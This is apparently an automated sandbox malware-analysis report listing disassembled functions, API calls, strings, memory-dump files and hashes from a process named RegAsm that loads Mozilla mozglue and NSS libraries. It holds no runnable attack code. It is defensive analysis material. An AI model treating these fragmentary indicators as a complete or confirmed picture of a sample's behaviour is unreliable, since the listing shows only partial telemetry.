?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C78E8A6

Part of subcall function 6C74B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C74B7CF
Part of subcall function 6C74B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C74B808

Part of subcall function 6C79B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C7C0FB6,00000000,?,?,6C78E69E), ref: 6C79B830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6C78E6DA

Part of subcall function 6C79B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C79B916
Part of subcall function 6C79B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C79B94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C78E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78E883

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C78E826
[I %d/%d] profiler_start, xrefs: 6C78EBB4
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C78E655
MOZ_PROFILER_STARTUP, xrefs: 6C78E5A1, 6C78E5FF
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C78E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C78E722
-21-2246122658-369X, xrefs: 6C78EADC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: -21-2246122658-369X$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
API String ID: 2698983630-1685988782
Opcode ID: 9cbcb62b7135b2d60bf58d365d123602ade3a0f002987c01d7f5281adf462dc0
Instruction ID: 31497232c948f7740727f17f5cd22877c8e9742e34e6b6ede7bbe991d68271ef
Opcode Fuzzy Hash: 9cbcb62b7135b2d60bf58d365d123602ade3a0f002987c01d7f5281adf462dc0
Instruction Fuzzy Hash: 37029C75A0130A9FCB10CF28C584A6AB7F5FF89308F14453DE99A9BB51D734EA44CB92

Function 6C757810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE744), ref: 6C757885
LeaveCriticalSection.KERNEL32(6C7CE744), ref: 6C7578A5
EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C7578AD
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C7578CD
EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C7578D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C7578E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C75795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C7579BB
LeaveCriticalSection.KERNEL32(?), ref: 6C757BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C757C82
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C757CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C757DAF

Strings

D|l, xrefs: 6C75789F
D|l, xrefs: 6C75787F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: D|l$D|l
API String ID: 759993129-609157922
Opcode ID: c6f26441ecaad97dea4a0ea5a95abd44d71793bc2f50329097eec4f11226e65e
Instruction ID: 51db085f4df539b23590c2fd0e51467d2c6a0fc696cc6b40401c255004b986cf
Opcode Fuzzy Hash: c6f26441ecaad97dea4a0ea5a95abd44d71793bc2f50329097eec4f11226e65e
Instruction Fuzzy Hash: C3026671E1161A8FDB54CF19C584799B7B5FF48314F6582AAD809A7711DB30BEA0CF80

Function 6C787E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

(pre-xul), xrefs: 6C787E88
data, xrefs: 6C788280, 6C7883E1
v|l, xrefs: 6C788207
name, xrefs: 6C787ECF, 6C788335
schema, xrefs: 6C7881E3, 6C788311

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$v|l
API String ID: 3412268980-283972010
Opcode ID: a76106ce67946ff272cab977c81e382c99c8c9cfb2d32635063b3eacefd6c2bf
Instruction ID: 2964ce53704c33e0fd96b91e77960135a7f44376c1da4b463a5b4a21eac830ad
Opcode Fuzzy Hash: a76106ce67946ff272cab977c81e382c99c8c9cfb2d32635063b3eacefd6c2bf
Instruction Fuzzy Hash: AEE19FB1B043418FC710CF68894466BFBE9BF85318F14892DE895E7790DBB0DD498B92

Function 6C76D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D50B

Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D52E
EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D6A6
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D712
LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D7EA

Strings

<jemalloc>, xrefs: 6C76D827
: (malloc) Error initializing arena, xrefs: 6C76D82C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
Instruction ID: 995d13fdeb35d8e484a8867a390f5a75d3f75f6c547f1bcc68da5d251c4f77d6
Opcode Fuzzy Hash: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
Instruction Fuzzy Hash: 2A91F571A147458FD714CF3AC29476AB7E1EBA9314F24893EE85A87F81D730E844CB86

Function 6C7A4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C7A4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7A4F2E
moz_xmalloc.MOZGLUE ref: 6C7A4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C7A4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7A52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7A52E6
Sleep.KERNEL32(00000010), ref: 6C7A5481
free.MOZGLUE(?), ref: 6C7A5498

Strings

(, xrefs: 6C7A5250

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: c4c469ad7cc3232120f3fec8e09ea67ed2127754b36d508a002566dd20f2ec8c
Instruction ID: 07405a19f8b6f237e98f08efe5396409d7a85b8b4ff012bb6402727b6824a051
Opcode Fuzzy Hash: c4c469ad7cc3232120f3fec8e09ea67ed2127754b36d508a002566dd20f2ec8c
Instruction Fuzzy Hash: 96F1CE71A18B018FC716CF39D85062BB7F9AFD6284F058B3EF946A7651DB31D8428B81

Function 6C8B6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F

Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C60
PR_ExplodeTime.NSS3(00000000,6C861C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C94

Strings

gfff, xrefs: 6C8B6D9C
gfff, xrefs: 6C8B6CFD
gfff, xrefs: 6C8B6CF5
gfff, xrefs: 6C8B6D66
gfff, xrefs: 6C8B6D30

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
Instruction ID: a185a8f48e782ba5d54b16ec129dba9c11bd233bff8a5014129a30d068e077fd
Opcode Fuzzy Hash: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
Instruction Fuzzy Hash: B3514C72B015494FC71CCDADDC626DAB7DAABA4310F48C23AE442DB785D638E906C751

Function 6C785190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7851DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C78529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C7852FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C78536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7853F7

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C7856C3
__Init_thread_footer.LIBCMT ref: 6C7856E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C7856BE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 37efe6e8f3460c240e7f060ebcf8b15d4571d756005117bb74ebe652e006f4e0
Instruction ID: 585a92204392728746c5002e4a5027e3fb704bd551d901f4e370c33159f900f8
Opcode Fuzzy Hash: 37efe6e8f3460c240e7f060ebcf8b15d4571d756005117bb74ebe652e006f4e0
Instruction Fuzzy Hash: 4BE1AE71915F49CAD712CF359850267B7BABF9B394F109B2EE8AF2A951DF30E0468301

Function 6C7A7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C7A7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C7A7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7A707E

Part of subcall function 6C7581B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a Time entry), ref: 6C7581DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7A7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7A709C
LocalFree.KERNEL32(?), ref: 6C7A70AA

Strings

### ERROR: %s: %s, xrefs: 6C7A7087
(null), xrefs: 6C7A706A, 6C7A7083

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 8fca71d3f39da3a8951b061fe6486736dfd6950a68cac2e5b63698e2fb54487c
Instruction ID: 430cd3f026f75cf42cdaefb347f1f2a5057c14fd56b9243c44ab240842ad5d3c
Opcode Fuzzy Hash: 8fca71d3f39da3a8951b061fe6486736dfd6950a68cac2e5b63698e2fb54487c
Instruction Fuzzy Hash: 3E01B9B1B00109AFDB005B64DC4EDAF7BBCEF49655F010435FA05A7241D671BA588BE1

Function 6C7A9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C7A9F3D
__aulldiv.LIBCMT ref: 6C7A9F77
__aullrem.LIBCMT ref: 6C7A9F8C
__aulldiv.LIBCMT ref: 6C7AA023

Strings

NaN, xrefs: 6C7A9EAB
-Infinity, xrefs: 6C7A9E60, 6C7A9E7B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 1eab92762bec6cdd079034ac0929f751c8652c9ec3dcdc8dd8ec183c1f4e6e2a
Instruction ID: 0ed3da3d516e6e7e70e8d85ced57f1c51eabf8214a216b95f72a87c8c18c06fc
Opcode Fuzzy Hash: 1eab92762bec6cdd079034ac0929f751c8652c9ec3dcdc8dd8ec183c1f4e6e2a
Instruction Fuzzy Hash: 81C1BE31F003199BDB14CFE9C9847AEB7B6EB88314F144629D405ABB81DB71AD4ACF91

Function 6C7B53C8 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B86AE

Strings

~qtl, xrefs: 6C7B5740, 6C7B9269, 6C7B5703, 6C7B921F, 6C7B9459, 6C7B56C7, 6C7B948F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qtl
API String ID: 2221118986-4039154517
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: 95fabf311e9c9ceec6afba558fe101773590c46c05f44143bd2c5a8eab45c7c1
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: 13C1B572E0011A8FCB14CF68CD90BEDB7B2EF95314F1542A9C959EB746D730A989CB90

Function 6C7B545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B8A4B

Strings

~qtl, xrefs: 6C7B5740, 6C7B9269, 6C7B5703, 6C7B921F, 6C7B9459, 6C7B56C7, 6C7B948F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qtl
API String ID: 2221118986-4039154517
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 43b63620c4766762d50e298508506ead9c8a38e7e8957a14f21546e44531ee93
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: F4B1E672E0121A8FDB14CF68CD907E9B7B2EF95314F1802B9C559EB786D730A985CB90

Function 6C7B542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C7B925C

Strings

~qtl, xrefs: 6C7B5740, 6C7B9269, 6C7B5703, 6C7B921F, 6C7B9459, 6C7B56C7, 6C7B948F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qtl
API String ID: 2221118986-4039154517
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: eb7fe4ae62fe846af9d49f715bda305596c7bedc38339d71bb0d1817cbd0e960
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 23B1C472E0120A8FDB14CE68C9816EDB7B2EF95314F184279C959EB785D730A989CB90

Function 6C7B50C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C7B8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C7B925C

Strings

~qtl, xrefs: 6C7B5740, 6C7B9269, 6C7B5703, 6C7B921F, 6C7B9459, 6C7B56C7, 6C7B948F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qtl
API String ID: 2221118986-4039154517
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: f43074bcb09bb26c8822a856f4f999d8c87c9029de12e9036035ea953ef09eb8
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: C4A1D672E0011B8BCB14CE68CD807D9B7B2EF95314F1842BAC959EB785D730A999CB90

Function 6C7AB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C759B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C7AB92D), ref: 6C759BC8
Part of subcall function 6C759B80: __Init_thread_footer.LIBCMT ref: 6C759BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7503D4,?), ref: 6C7AB955
NtQueryVirtualMemory.NTDLL ref: 6C7AB9A5
NtQueryVirtualMemory.NTDLL ref: 6C7ABA20
RtlNtStatusToDosError.NTDLL ref: 6C7ABA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C7ABA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C7ABA86

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 6f730ba602f4e587b6da41ea807fe5e3400925bb6b971b7ac5a054eb260d764f
Instruction ID: 105e623c6af29224f6a196f24ea1b2ad754aa8ff10a1325d1fcd873de0180197
Opcode Fuzzy Hash: 6f730ba602f4e587b6da41ea807fe5e3400925bb6b971b7ac5a054eb260d764f
Instruction Fuzzy Hash: 47514971E0121DDFDF14CEE8DA84ADEBBB6BB88314F144229E905B7604DB30B9468B91

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
